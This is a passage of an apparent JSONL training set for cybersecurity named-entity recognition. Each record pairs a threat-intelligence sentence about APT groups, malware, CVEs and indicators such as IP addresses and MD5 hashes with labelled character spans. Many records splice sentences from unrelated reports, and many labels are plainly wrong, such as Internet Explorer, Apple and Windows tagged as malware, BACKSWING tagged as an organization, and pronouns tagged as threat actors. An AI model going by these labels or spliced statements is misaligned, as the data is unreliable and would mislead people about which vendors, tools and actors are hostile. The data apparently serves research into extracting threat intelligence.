CVE-2017-1882": [[3966, 3979]], "FILEPATH: eqnedt32.exe": [[3983, 3995]], "FILEPATH: dropper": [[4006, 4013]], "FILEPATH: iassvcs.exe": [[4026, 4037]], "THREAT_ACTOR: chinese APT": [[4187, 4198]], "ORGANIZATION: ancient soviet republics": [[4232, 4256]], "MALWARE: Internet Explorer": [[4497, 4514]], "MALWARE: Flash": [[4519, 4524]], "THREAT_ACTOR: cyberattacks": [[4610, 4622]], "FILEPATH: Hussarini": [[4726, 4735]], "FILEPATH: OutExtra.exe": [[4876, 4888]], "FILEPATH: finder.exe": [[4945, 4955]], "ORGANIZATION: DeepSight": [[5014, 5023], [7796, 7805]], "THREAT_ACTOR: attack": [[5222, 5228]], "MALWARE: DLL": [[5284, 5287]], "MALWARE: hijacking": [[5288, 5297]], "FILEPATH: malware": [[5313, 5320], [6685, 6692]], "THREAT_ACTOR: Iron": [[5505, 5509]], "MALWARE: IronStealer": [[5585, 5596]], "MALWARE: Iron ransomware": [[5601, 5616]], "FILEPATH: Xagent”": [[5619, 5626]], "FILEPATH: Xagent.exe": [[5652, 5662]], "FILEPATH: worm": [[5702, 5706]], "THREAT_ACTOR: Xagent": [[5709, 5715]], "THREAT_ACTOR: JbossMiner Mining": [[5731, 5748]], "TOOL: Python": [[5775, 5781]], "SYSTEM: Linux": [[5834, 5839]], "ORGANIZATION: FireEye's": [[5895, 5904]], "THREAT_ACTOR: Ke3chang": [[5930, 5938], [6173, 6181], [6321, 6329], [6438, 6446]], "MALWARE: backdoor": [[6192, 6200], [6992, 7000]], "MALWARE: Okrum": [[6210, 6215], [7015, 7020]], "MALWARE: BS2005 backdoors": [[6338, 6354]], "MALWARE: RoyalDNS": [[6387, 6395]], "ORGANIZATION: NCC": [[6418, 6421]], "FILEPATH: BS2005 backdoors": [[6736, 6752]], "FILEPATH: TidePool malware": [[6796, 6812]], "ORGANIZATION: Palo Alto": [[6834, 6843]], "FILEPATH: Okrum malware": [[7055, 7068], [7367, 7380]], "FILEPATH: backdoors": [[7161, 7170]], "FILEPATH: Okrum backdoor": [[7232, 7246]], "FILEPATH: Ketrican backdoor": [[7266, 7283]], "FILEPATH: Ketrican backdoors": [[7397, 7415]], "FILEPATH: RoyalDNS malware": [[7514, 7530]], "FILEPATH: Ketrican": [[7537, 7545]], "ORGANIZATION: ESET": [[7575, 7579], [22176, 22180]], "FILEPATH: Okrum": [[7592, 7597], [8046, 8051], [8422, 8427]], "THREAT_ACTOR: Okrum": [[8276, 8281]], "MALWARE: keylogger": [[8294, 8303]], "MALWARE: enumerating network sessions": [[8339, 8367]], "ORGANIZATION: ClearSky": [[8807, 8815], [9126, 9134]], "THREAT_ACTOR: Pyongyang-affiliated hackers": [[9006, 9034]], "ORGANIZATION: multinational companies’": [[9072, 9096]], "FILEPATH: WinRAR": [[9217, 9223]], "THREAT_ACTOR: Lotus Blossom": [[9327, 9340]], "THREAT_ACTOR: APT32": [[9568, 9573]], "ORGANIZATION: Researchers": [[9777, 9788]], "THREAT_ACTOR: Lazarus": [[9800, 9807], [10178, 10185]], "MALWARE: malicious implant": [[9851, 9868]], "THREAT_ACTOR: Rising Sun": [[9878, 9888]], "TOOL: Visual Basic": [[10127, 10139]], "MALWARE: Invoke-PSImage": [[10212, 10226]], "TOOL: PowerShell": [[10265, 10275]], "THREAT_ACTOR: it": [[10328, 10330]], "FILEPATH: cmd.exe": [[10435, 10442]], "MALWARE: PowerShell": [[10491, 10501]], "ORGANIZATION: (DHS)": [[10540, 10545]], "ORGANIZATION: Talos": [[10760, 10765], [12887, 12892]], "ORGANIZATION: national security organizations": [[10880, 10911]], "ORGANIZATION: ministries": [[10914, 10924]], "ORGANIZATION: prominent energy organizations": [[10950, 10980]], "THREAT_ACTOR: actors": [[10994, 11000], [11128, 11134], [11236, 11242], [13948, 13954], [14225, 14231], [14582, 14588], [14813, 14819], [14960, 14966], [15667, 15673], [16380, 16386]], "THREAT_ACTOR: attacker": [[11409, 11417], [20405, 20413], [20548, 20556], [33103, 33111], [34368, 34376]], "THREAT_ACTOR: actor": [[11810, 11815], [12520, 12525], [12711, 12716], [12943, 12948]], "FILEPATH: Sea Turtle": [[11906, 11916]], "THREAT_ACTOR: threat vector": [[12033, 12046]], "THREAT_ACTOR: actors’": [[12342, 12349]], "MALWARE: MitM servers": [[12730, 12742], [14898, 14910]], "MALWARE: MitM server": [[12830, 12841], [13756, 13767]], "MALWARE: additional servers": [[12907, 12925]], "MALWARE: MitM": [[13074, 13078]], "THREAT_ACTOR: actor-controlled": [[13179, 13195], [13739, 13755]], "MALWARE: servers": [[13196, 13203], [15228, 15235]], "THREAT_ACTOR: actors'": [[13283, 13290]], "MALWARE: VPN applications": [[13314, 13330]], "MALWARE: Adaptive Security Appliance": [[13347, 13374]], "TOOL: ASA": [[13482, 13485]], "THREAT_ACTOR: they": [[13505, 13509], [15140, 15144]], "MALWARE: ASA's": [[13567, 13572]], "TOOL: VPN": [[13600, 13603], [15577, 15580], [31766, 31769], [31863, 31866], [33242, 33245], [33265, 33268]], "ORGANIZATION: Cafax": [[14274, 14279]], "ORGANIZATION: NetNod": [[14386, 14392]], "MALWARE: name servers": [[14647, 14659]], "THREAT_ACTOR: Sea Turtle": [[14662, 14672]], "ORGANIZATION: DNS registries": [[14726, 14740]], "ORGANIZATION: number of registrars": [[14747, 14767]], "MALWARE: Encrypts": [[14830, 14838]], "MALWARE: Comodo": [[14841, 14847]], "MALWARE: Sectigo": [[14850, 14857]], "MALWARE: self-signed certificates": [[14864, 14888]], "ORGANIZATION: manage": [[15085, 15091]], "ORGANIZATION: ccTLDs": [[15092, 15098]], "MALWARE: actor-controlled": [[15211, 15227]], "MALWARE: ASA": [[15563, 15566]], "ORGANIZATION: Cisco Talos": [[15789, 15800]], "MALWARE: xlsm file": [[16028, 16037]], "FILEPATH: it": [[16040, 16042]], "FILEPATH: link file": [[16144, 16153]], "FILEPATH: AutoHotkeyU32.exe": [[16180, 16197]], "MALWARE: TeamViewer": [[16328, 16338]], "FILEPATH: attacks": [[16425, 16432]], "THREAT_ACTOR: hacking division": [[16575, 16591]], "ORGANIZATION: NSA": [[16667, 16670]], "THREAT_ACTOR: CIA's hacking division": [[16780, 16802]], "MALWARE: hacking systems": [[16952, 16967]], "MALWARE: trojans": [[16970, 16977]], "MALWARE: viruses": [[16980, 16987]], "MALWARE: weaponized": [[17000, 17010]], "ORGANIZATION: Wikileaks": [[17147, 17156]], "THREAT_ACTOR: CIA": [[17231, 17234], [17501, 17504], [18053, 18056], [18832, 18835], [19046, 19049], [19706, 19709], [20034, 20037], [20143, 20146], [20637, 20640], [20950, 20953], [21679, 21682], [21765, 21768], [22440, 22443]], "MALWARE: Weeping Angel": [[17702, 17715]], "THREAT_ACTOR: CIA's": [[17735, 17740], [18152, 18157], [18374, 18379], [18634, 18639], [19151, 19156], [19535, 19540], [20331, 20336], [21145, 21150], [21369, 21374]], "MALWARE: smart TVs": [[17787, 17796]], "THREAT_ACTOR: Weeping Angel": [[17907, 17920]], "MALWARE: iPhones": [[18468, 18475]], "MALWARE: Apple": [[18486, 18491]], "MALWARE: iOS": [[18509, 18512]], "MALWARE: iPads": [[18523, 18528]], "ORGANIZATION: Samsung smart TVs": [[18550, 18567]], "THREAT_ACTOR: MI5/BTSS": [[18623, 18631]], "MALWARE: GCHQ": [[18727, 18731]], "MALWARE: NSA": [[18734, 18737]], "MALWARE: cyber arms contractors": [[18762, 18784]], "MALWARE: Hammer Drill": [[19255, 19267]], "MALWARE: Brutal Kangaroo": [[19415, 19430]], "MALWARE: Assassin": [[19680, 19688]], "MALWARE: Medusa": [[19693, 19699]], "MALWARE: Windows": [[19793, 19800]], "MALWARE: Mac OS X": [[19803, 19811]], "MALWARE: Solaris": [[19814, 19821]], "MALWARE: Linux": [[19824, 19829]], "MALWARE: HIVE": [[19855, 19859], [21654, 21658]], "MALWARE: Cutthroat": [[19876, 19885]], "MALWARE: Swindle": [[19890, 19897]], "ORGANIZATION: Apple": [[20013, 20018], [21871, 21876]], "ORGANIZATION: Google": [[20023, 20029], [21891, 21897]], "MALWARE: USB containing malware": [[20433, 20455]], "ORGANIZATION: media": [[20604, 20609]], "SYSTEM: Android": [[20722, 20729]], "ORGANIZATION: Comodo": [[20927, 20933]], "ORGANIZATION: CIA": [[21007, 21010]], "THREAT_ACTOR: UMBRAGE": [[21175, 21182]], "MALWARE: 'JQJIMPROVISE'": [[21375, 21389]], "FILEPATH: Margarita": [[21525, 21534]], "ORGANIZATION: Samsung": [[21900, 21907]], "ORGANIZATION: Nokia": [[21910, 21915]], "ORGANIZATION: Blackberry": [[21918, 21928]], "ORGANIZATION: Siemens": [[21931, 21938]], "ORGANIZATION: anti-virus companies": [[21943, 21963]], "ORGANIZATION: gaming industry": [[22262, 22277]], "ORGANIZATION: Kaspersky’s": [[22351, 22362]], "THREAT_ACTOR: Winnti": [[22363, 22369]], "MALWARE: OSB": [[22401, 22404]], "ORGANIZATION: Recorded Future": [[22625, 22640], [28232, 28247]], "ORGANIZATION: Rapid7": [[22645, 22651], [30268, 30274], [30756, 30762], [31110, 31116], [32951, 32957], [33288, 33294], [33535, 33541], [34271, 34277], [34713, 34719]], "FILEPATH: Honeycomb": [[22699, 22708]], "TOOL: C2": [[22878, 22880], [29330, 29332], [30087, 30089], [33642, 33644], [34623, 34625]], "THREAT_ACTOR: APT10": [[23095, 23100], [23263, 23268], [23271, 23276], [23717, 23722], [23940, 23945], [24454, 24459], [24645, 24650], [25011, 25016], [25078, 25083], [25294, 25299], [25441, 25446], [26186, 26191], [26519, 26524], [26847, 26852], [27058, 27063], [27585, 27590], [27971, 27976], [28269, 28274], [28568, 28573], [29260, 29265], [29830, 29835], [30032, 30037], [31005, 31010], [31311, 31316], [31407, 31412], [31517, 31522], [32057, 32062], [32296, 32301], [32480, 32485], [32974, 32979], [33310, 33315], [33860, 33865], [34099, 34104], [34508, 34513], [34829, 34834], [35400, 35405], [35593, 35598]], "MALWARE: UPPERCUT": [[23204, 23212], [31346, 31354]], "MALWARE: WinRAR": [[23334, 23340], [29846, 29852], [34110, 34116]], "TOOL: Dropbox": [[23390, 23397], [29972, 29979], [34330, 34337]], "MALWARE: cURL": [[23416, 23420], [29857, 29861]], "FILEPATH: UMBRAGE": [[23453, 23460]], "THREAT_ACTOR: Stone Panda": [[23737, 23748]], "THREAT_ACTOR: menuPass": [[23751, 23759]], "THREAT_ACTOR: CVNX": [[23762, 23766]], "THREAT_ACTOR: MSS": [[24222, 24225], [26054, 26057]], "ORGANIZATION: U.S. law firm": [[24667, 24680]], "ORGANIZATION: apparel company": [[24702, 24717], [27024, 27039], [32995, 33010]], "TOOL: DLL": [[24856, 24859], [29538, 29541], [30901, 30904], [31218, 31221], [32252, 32255], [33454, 33457], [33504, 33507]], "THREAT_ACTOR: APT10’s": [[24874, 24881]], "ORGANIZATION: Japanese corporations": [[24895, 24916], [31370, 31391]], "THREAT_ACTOR: Winnti Group": [[24996, 25008]], "ORGANIZATION: healthcare": [[25110, 25120]], "ORGANIZATION: defense": [[25123, 25130]], "ORGANIZATION: aerospace": [[25133, 25142]], "ORGANIZATION: government": [[25145, 25155]], "ORGANIZATION: heavy industry": [[25158, 25172]], "ORGANIZATION: mining": [[25177, 25183]], "ORGANIZATION: MSPs": [[25190, 25194], [28768, 28772], [34966, 34970]], "ORGANIZATION: IT services": [[25199, 25210]], "ORGANIZATION: sectors": [[25230, 25237]], "ORGANIZATION: Tianjin-based companies": [[25474, 25497]], "ORGANIZATION: Huaying Haitai Science": [[25510, 25532]], "THREAT_ACTOR: Chinese state-sponsored": [[25759, 25782]], "THREAT_ACTOR: Guangdong ITSEC": [[25837, 25852]], "ORGANIZATION: Boyusec": [[25920, 25927]], "THREAT_ACTOR: APT3": [[25974, 25978]], "MALWARE: Citrix": [[26574, 26580], [30799, 30805], [33162, 33168]], "MALWARE: LogMeIn": [[26585, 26592]], "ORGANIZATION: law firm": [[27007, 27015], [30588, 30596], [33081, 33089]], "ORGANIZATION: IT service": [[27112, 27122]], "ORGANIZATION: (MSPs)": [[27133, 27139]], "FILEPATH: 'Improvise'": [[27219, 27230]], "SYSTEM: MacOS": [[27423, 27428]], "TOOL: JukeBox": [[27431, 27438]], "TOOL: DanceFloor": [[27453, 27463]], "MALWARE: (Quasar RAT": [[27617, 27628]], "MALWARE: Trochilus": [[27631, 27640], [29307, 29316], [32204, 32213]], "MALWARE: RedLeaves": [[27643, 27652]], "MALWARE: ChChes": [[27655, 27661]], "ORGANIZATION: U.S. Department": [[27743, 27758]], "THREAT_ACTOR: Visma": [[28127, 28132]], "ORGANIZATION: MSP": [[28625, 28628]], "ORGANIZATION: Recorded Future’s": [[28640, 28657]], "ORGANIZATION: infrastructure providers": [[28793, 28817]], "THREAT_ACTOR: Rapid7": [[29066, 29072]], "MALWARE: Visma endpoints": [[29185, 29200]], "FILEPATH: sample": [[29471, 29477]], "FILEPATH: Trochilus": [[29497, 29506]], "FILEPATH: configuration file": [[29720, 29738]], "MALWARE: Dropbox": [[30072, 30079], [30292, 30299], [34261, 34268]], "TOOL: WinRAR": [[30107, 30113]], "MALWARE: Visma": [[30212, 30217], [30943, 30948]], "MALWARE: Dropbox API": [[30233, 30244]], "ORGANIZATION: They": [[30417, 30421]], "ORGANIZATION: Rapid7’s": [[30552, 30560]], "MALWARE: 1.bat": [[31046, 31051], [33753, 33758]], "MALWARE: cu.exe": [[31054, 31060]], "MALWARE: ss.rar": [[31063, 31069]], "MALWARE: r.exe": [[31072, 31077]], "MALWARE: pd.exe": [[31080, 31086]], "FILEPATH: gup.exe": [[31159, 31166]], "FILEPATH: ANEL": [[31304, 31308]], "MALWARE: Visma network": [[31449, 31462], [32349, 32362], [34492, 34505]], "ORGANIZATION: Visma": [[31551, 31556]], "MALWARE: Citrix remote desktop": [[31597, 31618]], "THREAT_ACTOR: Insikt Group": [[31708, 31720]], "FILEPATH: Citrix-hosted": [[31819, 31832]], "THREAT_ACTOR: APT28’s": [[32639, 32646]], "MALWARE: VPNFilter": [[32647, 32656]], "MALWARE: cyber-berkut": [[32702, 32714]], "THREAT_ACTOR: CyberBerkut": [[32819, 32830]], "FILEPATH: KHRAT": [[32833, 32838]], "MALWARE: backdoor trojan": [[32844, 32859]], "THREAT_ACTOR: DragonOK": [[32924, 32932]], "MALWARE: Mimikatz": [[33415, 33423]], "FILEPATH: Dropbox": [[33627, 33634]], "MALWARE: rar.exe”": [[34129, 34137]], "MALWARE: r.exe”": [[34141, 34147]], "MALWARE: BITSAdmin": [[34543, 34552]], "THREAT_ACTOR: APT10's": [[34927, 34934]], "ORGANIZATION: economic": [[35450, 35458]]}, "info": {"id": "cyberner_stix_train_002201", "source": "cyberner_stix_train"}}
{"text": "Perhaps the Dukes group thought that by faking a timestamp from before the earliest one cited in the whitepaper , they might be able to confuse researchers .", "spans": {"THREAT_ACTOR: Dukes": [[12, 17]]}, "info": {"id": "cyberner_stix_train_002202", "source": "cyberner_stix_train"}}
{"text": "All nine certificates were used maliciously in 2015 .", "spans": {}, "info": {"id": "cyberner_stix_train_002203", "source": "cyberner_stix_train"}}
{"text": "Beginning in May 2017 , FireEye observed a number of Ukrainian websites compromised with BACKSWING v1 , and in June 2017 , began to see content returned from BACKSWING receivers . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": {"ORGANIZATION: FireEye": [[24, 31]], "ORGANIZATION: BACKSWING v1": [[89, 101]], "ORGANIZATION: BACKSWING": [[158, 167]], "FILEPATH: ChopShop1": [[180, 189]], "ORGANIZATION: MITRE Corporation": [[226, 243]]}, "info": {"id": "cyberner_stix_train_002204", "source": "cyberner_stix_train"}}
{"text": "FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows .", "spans": {"ORGANIZATION: FireEye Labs": [[0, 12]], "VULNERABILITY: zero-day": [[65, 73]], "TOOL: Adobe Flash": [[93, 104]], "ORGANIZATION: Microsoft": [[128, 137]], "SYSTEM: Windows": [[138, 145]]}, "info": {"id": "cyberner_stix_train_002205", "source": "cyberner_stix_train"}}
{"text": "MD5s : c4c4077e9449147d754afd972e247efc Document.apk 0b8806b38b52bebfe39ff585639e2ea2 WUC ’ s Conference.apk Triada : organized crime on Android Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and uses several clever methods to become almost invisible March 3 , 2016 You know how armies typically move : first come the scouts to make sure everything is ok. Then the heavy troops The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection .", "spans": {"MALWARE: Triada": [[109, 115], [145, 151]], "SYSTEM: Android": [[137, 144]], "TOOL: Lambert family malware": [[446, 468]], "ORGANIZATION: FireEye": [[519, 526]], "VULNERABILITY: zero day exploit": [[549, 565]], "VULNERABILITY: CVE-2014-4148": [[568, 581]], "THREAT_ACTOR: actor": [[607, 612]]}, "info": {"id": "cyberner_stix_train_002206", "source": "cyberner_stix_train"}}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "FILEPATH: Okrum backdoor": [[175, 189]], "FILEPATH: Ketrican backdoor": [[209, 226]]}, "info": {"id": "cyberner_stix_train_002207", "source": "cyberner_stix_train"}}
{"text": "Small Trojans like Leech , Ztorg and Gopro now download one of the most advanced mobile Trojans our malware analysts have ever encountered — we call it Triada . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 .", "spans": {"MALWARE: Leech": [[19, 24]], "MALWARE: Ztorg": [[27, 32]], "MALWARE: Gopro": [[37, 42]], "MALWARE: Triada": [[152, 158]], "MALWARE: files": [[165, 170]], "VULNERABILITY: Microsoft Office vulnerability": [[194, 224]], "VULNERABILITY: CVE-2012-0158": [[227, 240]], "ORGANIZATION: defense industry": [[427, 443]]}, "info": {"id": "cyberner_stix_train_002209", "source": "cyberner_stix_train"}}
{"text": "A recent whois of “ goldncup.com ” . Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . The graph highlights the at least 3 different variants of Ursnif that were being hosted on the bevendbrec.com site . The fact the attackers were attempting to connect in realtime with victims over phones and video conferences for conversations rather than just engaging over email is also unusual , suggesting confidence in the attackers skills in English and in impersonation although it is not clear if any conversations ended up taking place .", "spans": {"ORGANIZATION: FireEye": [[59, 66]], "THREAT_ACTOR: APT32": [[80, 85]], "ORGANIZATION: foreign corporations": [[96, 116]], "ORGANIZATION: manufacturing": [[154, 167]], "ORGANIZATION: consumer products": [[170, 187]], "ORGANIZATION: hospitality sectors": [[194, 213]], "MALWARE: Ursnif": [[274, 280]], "DOMAIN: bevendbrec.com": [[311, 325]], "THREAT_ACTOR: attackers": [[346, 355]]}, "info": {"id": "cyberner_stix_train_002210", "source": "cyberner_stix_train"}}
{"text": "The “ VPN Filter ” malware has also been attributed to STRONTIUM by the FBI .", "spans": {"MALWARE: VPN Filter": [[6, 16]], "THREAT_ACTOR: STRONTIUM": [[55, 64]], "ORGANIZATION: FBI": [[72, 75]]}, "info": {"id": "cyberner_stix_train_002211", "source": "cyberner_stix_train"}}
{"text": "The Dukes primarily target Western governments and related organizations , such as government ministries and agencies , political think tanks , and governmental subcontractors .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_002212", "source": "cyberner_stix_train"}}
{"text": "Given that this is an active threat , we ’ ve been working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from this threat and only decided to come forward with this information after the research team at Kaspersky released a report earlier today . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla – the White Atlas framework \" from mid-2016 . Each value under this key represents a separate Svchost group and appears as a separate instance when you are viewing active processes . The videos were quickly passed around offices while users ’ systems were silently infected in the background , and many of the APT ’s components were signed with phony Intel and AMD digital certificates .", "spans": {"ORGANIZATION: Kaspersky": [[258, 267]], "TOOL: WhiteBear": [[302, 311]], "TOOL: Skipper Turla": [[357, 370], [443, 456]], "TOOL: White Atlas": [[463, 474]], "TOOL: Svchost": [[551, 558]]}, "info": {"id": "cyberner_stix_train_002213", "source": "cyberner_stix_train"}}
{"text": "While we believe CosmicDuke to be an entirely custom- written toolset with no direct sharing of code with other Duke toolsets , the high-level ways in which many of its features have been implemented appear to be shared with other members of the Duke arsenal .", "spans": {"MALWARE: CosmicDuke": [[17, 27]], "THREAT_ACTOR: Duke": [[112, 116], [246, 250]]}, "info": {"id": "cyberner_stix_train_002214", "source": "cyberner_stix_train"}}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Hackers used the remote access to detect servers of their interest in the internal network .", "spans": {"MALWARE: Ploutus": [[55, 62]]}, "info": {"id": "cyberner_stix_train_002215", "source": "cyberner_stix_train"}}
{"text": "The commands received via GCM can not be blocked immediately on an infected device . Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations . As with previous ShadowPad variants , the Config module ( 102 ) contains an encrypted string pool that can be accessed from any other module . If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": {"SYSTEM: GCM": [[26, 29]], "MALWARE: ShadowPad": [[367, 376]], "VULNERABILITY: If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions": [[493, 691]]}, "info": {"id": "cyberner_stix_train_002216", "source": "cyberner_stix_train"}}
{"text": "220.158.216.127 to gather additional Zebrocy samples as well as a weaponized document .", "spans": {"IP_ADDRESS: 220.158.216.127": [[0, 15]], "MALWARE: Zebrocy": [[37, 44]]}, "info": {"id": "cyberner_stix_train_002217", "source": "cyberner_stix_train"}}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "THREAT_ACTOR: Threat Group 3390": [[110, 127]], "THREAT_ACTOR: Emissary Panda": [[144, 158]]}, "info": {"id": "cyberner_stix_train_002219", "source": "cyberner_stix_train"}}
{"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"TOOL: CARBANAK malware": [[15, 31]], "THREAT_ACTOR: FIN7": [[35, 39]], "ORGANIZATION: banking transactions": [[179, 199]], "ORGANIZATION: governments": [[389, 400]], "ORGANIZATION: militaries": [[403, 413]], "ORGANIZATION: defense attaches": [[416, 432]], "ORGANIZATION: media entities": [[435, 449]], "ORGANIZATION: dissidents": [[456, 466]], "ORGANIZATION: figures": [[471, 478]], "ORGANIZATION: Russian government": [[502, 520]]}, "info": {"id": "cyberner_stix_train_002220", "source": "cyberner_stix_train"}}
{"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": {"THREAT_ACTOR: Scattered Canary": [[11, 27]], "VULNERABILITY: phishing": [[96, 104]], "FILEPATH: Careto": [[174, 180]]}, "info": {"id": "cyberner_stix_train_002221", "source": "cyberner_stix_train"}}
{"text": "During one intrusion , the threat actors extensively used this tool to execute WMI commands on remote hosts in the environment .", "spans": {"TOOL: WMI": [[79, 82]]}, "info": {"id": "cyberner_stix_train_002222", "source": "cyberner_stix_train"}}
{"text": "Also , we found the IP address 185.25.50.93 hosting C2 services for a Delphi backdoor that ESET ’s report states is the final stage payload for these attacks .", "spans": {"IP_ADDRESS: 185.25.50.93": [[31, 43]], "TOOL: C2": [[52, 54]], "TOOL: Delphi": [[70, 76]], "ORGANIZATION: ESET": [[91, 95]]}, "info": {"id": "cyberner_stix_train_002223", "source": "cyberner_stix_train"}}
{"text": "The first attack vector is to compromise the out of band authentication for online banks that rely on SMS using SMS forwarding . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format . txt . These restrictions are specified by a list of allowed URIs .", "spans": {"TOOL: XBOW": [[129, 133]], "TOOL: BIFROSE": [[167, 174]], "TOOL: KIVARS": [[179, 185]], "FILEPATH: txt": [[251, 254]], "SYSTEM: allowed URIs": [[303, 315]]}, "info": {"id": "cyberner_stix_train_002224", "source": "cyberner_stix_train"}}
{"text": "Files of the FLV file format contain a sequence of Tag structures .", "spans": {"TOOL: FLV": [[13, 16]]}, "info": {"id": "cyberner_stix_train_002225", "source": "cyberner_stix_train"}}
{"text": "Both WERDLOD and OSX_DOK.C targeted financial institutions , with a particular focus on banks in Switzerland .", "spans": {"MALWARE: WERDLOD": [[5, 12]], "MALWARE: OSX_DOK.C": [[17, 26]]}, "info": {"id": "cyberner_stix_train_002226", "source": "cyberner_stix_train"}}
{"text": "Callisto Group appears to be intelligence gathering related to European foreign and security policy . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"THREAT_ACTOR: TG-3390": [[118, 125]], "VULNERABILITY: CVE-2011-3544": [[140, 153]], "MALWARE: HTTPBrowser backdoor": [[221, 241]], "VULNERABILITY: CVE-2010-0738": [[248, 261]], "MALWARE: JBoss": [[283, 288]], "VULNERABILITY: exploit": [[389, 396]]}, "info": {"id": "cyberner_stix_train_002227", "source": "cyberner_stix_train"}}
{"text": "In earlier versions , the something part of the relative path was a partially intelligible , yet random mix of words and short combinations of letters and numbers separated by an underscore , for example , “ bee_bomb ” or “ my_te2_mms ” . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . This time , the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors . According to the Education Data Initiative , \" Public education spending in the United States falls short of global benchmarks and lags behind economic growth . \"", "spans": {"THREAT_ACTOR: TG-3390": [[265, 272]], "TOOL: SWCs": [[310, 314]], "VULNERABILITY: CVE-2016-8655": [[573, 586]], "VULNERABILITY: Dirty COW": [[591, 600]], "VULNERABILITY: CVE-2016-5195": [[611, 624]], "ORGANIZATION: Education Data Initiative": [[664, 689]]}, "info": {"id": "cyberner_stix_train_002228", "source": "cyberner_stix_train"}}
{"text": "Specifically , Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro . First , Turla steals emails by forwarding all outgoing emails to the attackers . ZxShell implemented its own version of the Windows B-TOOL S-OS SC command . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": {"ORGANIZATION: Lookout": [[15, 22]], "SYSTEM: SR Chat": [[77, 84]], "SYSTEM: YeeCall Pro": [[89, 100]], "THREAT_ACTOR: Turla": [[111, 116]], "MALWARE: ZxShell": [[184, 191]], "VULNERABILITY: ProxyNotShell": [[330, 343]], "VULNERABILITY: allowing code execution through PowerShell remoting": [[346, 397]]}, "info": {"id": "cyberner_stix_train_002229", "source": "cyberner_stix_train"}}
{"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme .", "spans": {"THREAT_ACTOR: Rocke": [[31, 36]], "VULNERABILITY: CVE-2018-1000861": [[105, 121]], "VULNERABILITY: CVE-2019-1003000": [[126, 142]], "MALWARE: PyLocky": [[173, 180]]}, "info": {"id": "cyberner_stix_train_002230", "source": "cyberner_stix_train"}}
{"text": "The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server , but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed .", "spans": {"TOOL: DealersChoice": [[12, 25]], "TOOL: Flash": [[81, 86], [144, 149]], "TOOL: C2": [[101, 103]]}, "info": {"id": "cyberner_stix_train_002231", "source": "cyberner_stix_train"}}
